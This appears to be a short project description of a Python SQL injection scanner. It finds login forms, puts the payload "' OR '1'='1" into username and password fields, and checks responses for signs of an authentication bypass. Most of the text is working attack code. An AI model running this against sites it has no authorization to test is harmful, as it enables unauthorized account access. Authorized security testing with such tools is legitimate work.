SQLInjectionScanner

Project Overview

Automates detection of SQL injection vulnerabilities by parsing web forms, injecting payloads, and analyzing HTTP responses for error signatures or bypass indicators.

Form Discovery

Uses BeautifulSoup to locate forms on the page:

resp = s.get(url)
soup = BeautifulSoup(resp.content, "html.parser")
forms = soup.find_all("form")

Returns each <form> element for further analysis.

Payload Construction

Extracts form details, then builds a data dictionary injecting "' OR '1'='1" into input fields named username or password:

for field in details['inputs']:
    if field['name'].lower() in ('user', 'username', 'password'):
        data[field['name']] = "' OR '1'='1"
    elif field['type']=='hidden' or field['value']:
        data[field['name']] = field['value']
    else:
        data[field['name']] = 'testing'

Preserves hidden fields and assigns dummy values to others.

Attack Execution & Analysis

Sends the crafted payload via GET or POST and inspects the response body:

if method=='post':
    resp = s.post(action_url, data=data)
else:
    resp = s.get(action_url, params=data)
body = resp.text.lower()
if 'sign off' in body:
    print("Authentication bypass detected")
else:
    print("No bypass detected")

Flags a successful bypass when the response contains known post-login markers (e.g., "Sign Off").